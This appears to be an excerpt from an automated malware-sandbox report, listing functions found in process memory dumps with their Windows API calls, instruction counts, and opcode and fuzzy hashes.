Instruction ID: 646d5d2e3f198f154ff2e2572ede95ba03b0565fec9e4b22cdc2af122ad843fb
Opcode Fuzzy Hash: 7947b834ec62c999a3f0ac77a891cf674eb3024af98ffa8dfd2d63443eb28e51
Instruction Fuzzy Hash: 03323A74A14224CFCB659FB4C88869DB7B6BF88305F6080EAD50EA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A6F3F, Relevance: 2.0, APIs: 1, Instructions: 486libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 605ffdf0379b99727480119c059cca41939b349cb179d6a4dd7417e435441670
Instruction ID: 82e9cf37cef34c95b9b8ca963a85a46eda501010667ba156213760d1f796f71a
Opcode Fuzzy Hash: 605ffdf0379b99727480119c059cca41939b349cb179d6a4dd7417e435441670
Instruction Fuzzy Hash: 07323A74A14224CFCB649FB4C88869DB7B6BF88305F6081EAD50EA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A6F86, Relevance: 2.0, APIs: 1, Instructions: 479libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 775652199cb69dbb42c381f12397ef18e4e5e112cd4c10431a94dc1d5e0fff16
Instruction ID: e91d665b8e47a950d86e04468697c73eb18f0f4ae3095ccaaaea49cae89ee68e
Opcode Fuzzy Hash: 775652199cb69dbb42c381f12397ef18e4e5e112cd4c10431a94dc1d5e0fff16
Instruction Fuzzy Hash: 85222A74A14224CFCB64AFB4C88869DB7B6BF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A6FCD, Relevance: 2.0, APIs: 1, Instructions: 472libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6a9ed03af218a1758f9fe1ab0d02cc918150656a58a4ac171a06515d75419bc
Instruction ID: eab1cf20bababcdab3654b66c8403133e296a5de76a4652e86e2ca5f91d4c558
Opcode Fuzzy Hash: a6a9ed03af218a1758f9fe1ab0d02cc918150656a58a4ac171a06515d75419bc
Instruction Fuzzy Hash: 7C223A74A14224CFCB64AFB4C88869DB7B6BF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A7014, Relevance: 2.0, APIs: 1, Instructions: 463libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13bba2db6241758054ff24cc2e9dd3ccdabbb8e3f6a0a598edb19d18acb63875
Instruction ID: 4a2333cf72de023ebf447619da139ddb65a029965496633dc999e945775158e5
Opcode Fuzzy Hash: 13bba2db6241758054ff24cc2e9dd3ccdabbb8e3f6a0a598edb19d18acb63875
Instruction Fuzzy Hash: DC223B74A14224CFCB649F74C88869DB7B6BF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A7052, Relevance: 2.0, APIs: 1, Instructions: 458libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c551c9fbe442f224b636e1d78b1795e5da59115903e0c06d362cd92891760fc7
Instruction ID: 212c30f62c3ddc631a80825d8ceea7e5b416ee4f1bbbdfaa5ece8e2d60310592
Opcode Fuzzy Hash: c551c9fbe442f224b636e1d78b1795e5da59115903e0c06d362cd92891760fc7
Instruction Fuzzy Hash: 21223A74A14224CFCB64AFB4C88869DB7B6BF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A7099, Relevance: 2.0, APIs: 1, Instructions: 451libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e0784515815fd70663525357859885cc00ce4b4dedc05b1d9991570c50ef49b
Instruction ID: d790a248afdf832078b28eb9a1ab0626127bb7e581454e4b34078bbeceea3713
Opcode Fuzzy Hash: 0e0784515815fd70663525357859885cc00ce4b4dedc05b1d9991570c50ef49b
Instruction Fuzzy Hash: F6223A74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A70E3, Relevance: 1.9, APIs: 1, Instructions: 444libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eef467d6bbddcb13339882cf56c1c8b57827ecc7080d31006ae6bc39e9ff958c
Instruction ID: 8b682f0f95dd447dd70f1081c4a00c950b1d716a59e2b391a00aec75bc5cb060
Opcode Fuzzy Hash: eef467d6bbddcb13339882cf56c1c8b57827ecc7080d31006ae6bc39e9ff958c
Instruction Fuzzy Hash: 46123B74A14224CFCB64AFB4C88869DB7B6BF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A712D, Relevance: 1.9, APIs: 1, Instructions: 437libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 93c3282a0911e1a292bc808c338e72449632d94e860af5420b26fe2969a8eca5
Instruction ID: 7ae545497352fb122548fe94d34ef55fe315aa2928f3e5b97906944d5c3c727d
Opcode Fuzzy Hash: 93c3282a0911e1a292bc808c338e72449632d94e860af5420b26fe2969a8eca5
Instruction Fuzzy Hash: 6A123A74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A7177, Relevance: 1.9, APIs: 1, Instructions: 428libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e39d4e3eff55df53ca309c0fe1107ccb4662b27f0cafed5808abdaced060c810
Instruction ID: f1c95d33456708590cc937564b2592d86aea13fd61d93543f9eec3fa2d59c89e
Opcode Fuzzy Hash: e39d4e3eff55df53ca309c0fe1107ccb4662b27f0cafed5808abdaced060c810
Instruction Fuzzy Hash: C1123B74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A71B5, Relevance: 1.9, APIs: 1, Instructions: 421libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16efd8e6cd79d8240de8ee9cd9b65d012610f99ad90016a2ad453f03d613b4af
Instruction ID: 43acf419844014e6f83aab1b9ec37cd10c0bd10c429914e2dd2fed0d2e36c5a8
Opcode Fuzzy Hash: 16efd8e6cd79d8240de8ee9cd9b65d012610f99ad90016a2ad453f03d613b4af
Instruction Fuzzy Hash: 3F122C74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A71F3, Relevance: 1.9, APIs: 1, Instructions: 416libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ba8e0b66c38b809c4357ba5bf431321f806a3d8cf17cde996e36e06c51be50a
Instruction ID: a063cd32ae56157880b2bf5254161bd53f898bea7275679c24fbda8fa4be19a5
Opcode Fuzzy Hash: 8ba8e0b66c38b809c4357ba5bf431321f806a3d8cf17cde996e36e06c51be50a
Instruction Fuzzy Hash: 33122C74A14224CFCB64AFB4C88869DB7BABF88305F5081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A723D, Relevance: 1.9, APIs: 1, Instructions: 409libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3810a6ee0ed5a13cd5b9a9ccd1c9b5d95731d8a66f56725cc3f58bf4845216b1
Instruction ID: d682f53641c206e9b3eb5c6a4954af2d2c69f29b5007a6820717066c351dde31
Opcode Fuzzy Hash: 3810a6ee0ed5a13cd5b9a9ccd1c9b5d95731d8a66f56725cc3f58bf4845216b1
Instruction Fuzzy Hash: 11022A74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB359E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A7287, Relevance: 1.9, APIs: 1, Instructions: 402libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb8b5b3703442801fcfc3202e0103abfcb52bbf90ed1cb3f55c2583cf6c39dc5
Instruction ID: b0e3757bf569efa4f753f9ac87bea34867f04a6a361a26dcbb7461be327e9fc4
Opcode Fuzzy Hash: eb8b5b3703442801fcfc3202e0103abfcb52bbf90ed1cb3f55c2583cf6c39dc5
Instruction Fuzzy Hash: 31022A74A14224CFCB649FB4C88869DB7BABF88305F6081EAD50DA3744DB358E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012A72D1, Relevance: 1.9, APIs: 1, Instructions: 395libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012A7425

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74527d7bd11bb23294cb8c745d71cf7a1e6d3df9d3881ba3b5a345efc6ad29b7
Instruction ID: eb3b7bed5c38484ba92f2ee874bd82d6e9e85c04d44947b8469fd3ef2f21eddd
Opcode Fuzzy Hash: 74527d7bd11bb23294cb8c745d71cf7a1e6d3df9d3881ba3b5a345efc6ad29b7
Instruction Fuzzy Hash: AA022974A14224CFCB649FB4C88869DB7BABF88305F6085EAD50DA3744DB358E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C6718, Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137370b8ba2329349c5e275b7c8e612a2da65fa71c887dd4b11fc54e133cfe5d
Instruction ID: 34446be89752d9ad039bb5c1052f53b1a2a5581c85c6f83107b50b5f8b4c9a6d
Opcode Fuzzy Hash: 137370b8ba2329349c5e275b7c8e612a2da65fa71c887dd4b11fc54e133cfe5d
Instruction Fuzzy Hash: 1591CC71D04389AFCF02CFA9C8809DDBFB1EF4A710F15866BE405AB212C735A845EB51

Uniqueness

Uniqueness Score: -1.00%

Function 013A76DA, Relevance: 1.7, APIs: 1, Instructions: 211threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(3D677403,-C1BF55FC), ref: 013A790E

Memory Dump Source

Source File: 00000004.00000002.112528275777.00000000013A7000.00000040.00000001.sdmp, Offset: 013A7000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 45d74e657f3aefa314e03158ba14d4c594c354d2689b955248b1d35cc66df486
Instruction ID: a63862cabb59634257a434a40157d9fcef218149521e9e0f7fb9445db99d78c3
Opcode Fuzzy Hash: 45d74e657f3aefa314e03158ba14d4c594c354d2689b955248b1d35cc66df486
Instruction Fuzzy Hash: 4B314675900316CFEF35CF28C4E8BA637E5EF11219F4556AAC8499B276E3378984CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0187F610, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0187F651

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e9d7976f7a41e131169e25b6c873928c9cd991d332ced5bc72450fb3168c648
Instruction ID: 1d2842106e5a3b3f7141118b463e9c15a725dd6dbdfeeac1b2a50566d0b1f148
Opcode Fuzzy Hash: 5e9d7976f7a41e131169e25b6c873928c9cd991d332ced5bc72450fb3168c648
Instruction Fuzzy Hash: 1F617D34A10219DBDB14EFB5C4887AEBBF6AF84345F108829D516E7394DF35E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 21572518, Relevance: 1.7, APIs: 1, Instructions: 172libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 215725D7

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b06f988399ab16f34a4b68674cc6c7423df96d119211073fdec66f21ba8cf03
Instruction ID: fc29d72f548061161d66ed2ca8517a859a6a45b399a12bebec5b4d3a11cdcdba
Opcode Fuzzy Hash: 7b06f988399ab16f34a4b68674cc6c7423df96d119211073fdec66f21ba8cf03
Instruction Fuzzy Hash: F451B331A002459FC705EBB4C895AAEB7F5BF89304F1489AAD406DB391EF71EC05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 21572578, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 215725D7

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 800d27cd32630982afbb020255ecb939498408fba6edd712097c54a60f8919bb
Instruction ID: 305c7ec1f113139688a681f6bd54e835253ba78612c32cc4899e5b80ee92abf1
Opcode Fuzzy Hash: 800d27cd32630982afbb020255ecb939498408fba6edd712097c54a60f8919bb
Instruction Fuzzy Hash: 9E517371B102059BCB04EBB4C885A9EB7F9BF89204F148969D5069B391DF71ED05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013A7821, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528275777.00000000013A7000.00000040.00000001.sdmp, Offset: 013A7000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79cec819c859ba164edd47ffef7b7997224099e100d86e3065e1601b29730de
Instruction ID: 700b4b4fbcbc20241c31ed4baa1b5112d12f7121aac217b37e016fb4190e356a
Opcode Fuzzy Hash: d79cec819c859ba164edd47ffef7b7997224099e100d86e3065e1601b29730de
Instruction Fuzzy Hash: 9F4175214002555EEA359E6D4ADE7AC3F5FEB02D3EFC90B56C274062F7CA276285C292

Uniqueness

Uniqueness Score: -1.00%

Function 2157A0F8, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c26352fc113b3e320636b55613a54600c6c7c659dce14f52cc8c33da1e548c
Instruction ID: f5f2c8dcdc77e4ba23909f91332458b7e1267971e5df02e3fd64114ff1829db8
Opcode Fuzzy Hash: b3c26352fc113b3e320636b55613a54600c6c7c659dce14f52cc8c33da1e548c
Instruction Fuzzy Hash: 16412632E043998FCB00CFB9D8146EEBBF4AF86320F1585ABD504A7251DB749945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 015FA9D2, Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 015FAAE4

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7ee31d4e868abaa9ffd16a9df9507a18fdac6b936efb0231f2c4bfd28049cf38
Instruction ID: 95526d1ddbe49b8550da6fa5412c40ad51330a746f9858971f21c5748ca05bc8
Opcode Fuzzy Hash: 7ee31d4e868abaa9ffd16a9df9507a18fdac6b936efb0231f2c4bfd28049cf38
Instruction Fuzzy Hash: C94169B0D042898FDB00CFA9C584A9EBFF5BF49304F14856ED549AB342D7759849CB52

Uniqueness

Uniqueness Score: -1.00%

Function 015FAC8A, Relevance: 1.6, APIs: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 015FADA1

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 390a9692ba4ff4f969826d6e1cfa19861f50e15e860b876bb49df36b2e48ce4f
Instruction ID: 9e8a516d329a4d3daebeb4218971fe464cae688a21fa516448785fad5717d5cd
Opcode Fuzzy Hash: 390a9692ba4ff4f969826d6e1cfa19861f50e15e860b876bb49df36b2e48ce4f
Instruction Fuzzy Hash: EA4124B0E002489FDB10CFA9C884A9EBFF5BF48754F15846EE948AB355D774A844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C67F8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E3C690A

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c43a2fb71be48d4802aebe906a97fdcf28b5ea615b036056ba8487e5f0079946
Instruction ID: d93952db917ca344269010c404a32e6a6a3c9079e90acae43acb22d8596aa2e3
Opcode Fuzzy Hash: c43a2fb71be48d4802aebe906a97fdcf28b5ea615b036056ba8487e5f0079946
Instruction Fuzzy Hash: 4441C1B1D00349DFDF14CF9AC884ADEBBB5BF48710F20822AE819AB210D770A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0187F5B2, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0187F651

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0305a6d35294dfee3f19bd0d695ffa38de146d13dfb98d203d82769bd69bf826
Instruction ID: 6c8e7951d6675b638c70cc72811e082222636dee17e848f720578e8504971b4b
Opcode Fuzzy Hash: 0305a6d35294dfee3f19bd0d695ffa38de146d13dfb98d203d82769bd69bf826
Instruction Fuzzy Hash: 1831E130A08345DFDB01DFB9C494A9EBBF2AF85304F1488A9E114AB352CB35E845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 015F727C, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 015FADA1

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 64ffdcdcc213447c2ddec6633cbebd3093409a5708e84597ad429fa77305ffee
Instruction ID: dc0b6d2159dfdb7798eeed8a7b0418f6c23148174c090a215939dfccc29a722e
Opcode Fuzzy Hash: 64ffdcdcc213447c2ddec6633cbebd3093409a5708e84597ad429fa77305ffee
Instruction Fuzzy Hash: A231CEB1D002589FCB20CF9AC884A9EBFF5BF48714F14842EE918AB354D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015F7270, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 015FAAE4

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7939c3465cb2e9afbcf6bed2722c3618379cc9a9545c32ceeecc498fa703250d
Instruction ID: 4ac1a3041b475c13d0a692d2a99c67f6022bb8337ecef769436127f95a4d3ecf
Opcode Fuzzy Hash: 7939c3465cb2e9afbcf6bed2722c3618379cc9a9545c32ceeecc498fa703250d
Instruction Fuzzy Hash: 183100B0D002898FDB10CF99C584A8EFFF5BF48304F24856EE509AB301C7B5A989CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CB44E, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1E3CB4E1

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5522fe4b256cdf6afa68e5b122aab9ff22746b9d3872ae1e8756d5f52c75ff67
Instruction ID: 8dbe7bb386069b52393b892669a372b73230e5070f95e699a3743d9059f58e20
Opcode Fuzzy Hash: 5522fe4b256cdf6afa68e5b122aab9ff22746b9d3872ae1e8756d5f52c75ff67
Instruction Fuzzy Hash: B0311AB8A04605CFCB04CF95C444A9AFBF6FF88314F24CA59D51AAB321D775E841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 2157F804, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 2157F86D

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: dbaf64dd30942f9e83d614e782871a4f822050a1402948fd1cf33369d4941e42
Instruction ID: 290ef6ff9fc03e31410d9544c6eb962b619719d90a32dada834c02bbdd60fdc8
Opcode Fuzzy Hash: dbaf64dd30942f9e83d614e782871a4f822050a1402948fd1cf33369d4941e42
Instruction Fuzzy Hash: 0C212371808294CFEB15CFE1C5417EEBFF4AB4A310F1081AEC194A7692D379A905DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CA550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E3CA5D7

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7f9e7f1d26ec44de121aefbc690ef0b76a7af3a3c695695d8cedea7bf52132d1
Instruction ID: a57bc18e6af04e139ef3c25cac3471bda674f5b0388e97146405d70fb1ebfc55
Opcode Fuzzy Hash: 7f9e7f1d26ec44de121aefbc690ef0b76a7af3a3c695695d8cedea7bf52132d1
Instruction Fuzzy Hash: 9421E3B5D002489FDB10CFAAD984ADEBBF8EB48320F10841AE955A7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CA54F, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E3CA5D7

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 74fb56278913fe1df84b4fbf406b8a3cd714da8359caf173659f0f13e0963f17
Instruction ID: d2afbf45ad16e35c15dd90cf6a3b817d5d79d70480798ed65d45136e0e1b9743
Opcode Fuzzy Hash: 74fb56278913fe1df84b4fbf406b8a3cd714da8359caf173659f0f13e0963f17
Instruction Fuzzy Hash: E821E0B5D002489FDB10CFAAD984AEEBFF4EF48320F14851AE955A7350C378AA54CF61

Uniqueness

Uniqueness Score: -1.00%

Function 2157A1C8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,2157A14A), ref: 2157A237

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 03f70c0861a6194973774f74b6dd3a4869e5472f6f8a84de8796050aaa0cc659
Instruction ID: 524ebd2d84f6f104fd514e491cdfa190bff1e9011ef3fd793a35aaeda62a7029
Opcode Fuzzy Hash: 03f70c0861a6194973774f74b6dd3a4869e5472f6f8a84de8796050aaa0cc659
Instruction Fuzzy Hash: 151144B1C006699BCB00CFAAD844BDEFBF4AF49324F14856AD818B7240D778A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 2157DCF0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 2157F9A6

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: a17b29f6783fa0d4856dc59559542f3d521c8a9eeee16cdd0bdf4f09cdbb8c99
Instruction ID: e3800e6814a4a1e709a1b0043e54aa4f436d27023fdbb7df87e821841d4f2247
Opcode Fuzzy Hash: a17b29f6783fa0d4856dc59559542f3d521c8a9eeee16cdd0bdf4f09cdbb8c99
Instruction Fuzzy Hash: 4B2130B19002099FCB10CF9AC885ADEFBF4FF89210F10856ED459B7200C374A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013A78EA, Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(3D677403,-C1BF55FC), ref: 013A790E

Memory Dump Source

Source File: 00000004.00000002.112528275777.00000000013A7000.00000040.00000001.sdmp, Offset: 013A7000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: e6b77bde97fffbb02393ebc35083cf2a429bcf68cef1f903fc795c45c0ee5edb
Instruction ID: 2e5d5cd8e03e5565bd43ec801d1000ae5ff9b80a34838310524dff107bc0eb81
Opcode Fuzzy Hash: e6b77bde97fffbb02393ebc35083cf2a429bcf68cef1f903fc795c45c0ee5edb
Instruction Fuzzy Hash: 4A1163309003469FEF259F28C4E8BA577D5EF0262EF895799C4444B2B3C7379585CB81

Uniqueness

Uniqueness Score: -1.00%

Function 21574BA4, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,2157A14A), ref: 2157A237

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f5c11fbbacfac032ba769ea1d34f700d1a4693e28ae6553f3f4a0920c764e586
Instruction ID: a16126507fab0f6e212be658651d44d669611b764114985c3f637456fd47ad07
Opcode Fuzzy Hash: f5c11fbbacfac032ba769ea1d34f700d1a4693e28ae6553f3f4a0920c764e586
Instruction Fuzzy Hash: DB1136B1C006599BCB00CF9AD844BDEFBF4AF49320F14856AE914B7240D778A955CFA1

Uniqueness

Uniqueness Score: -1.00%

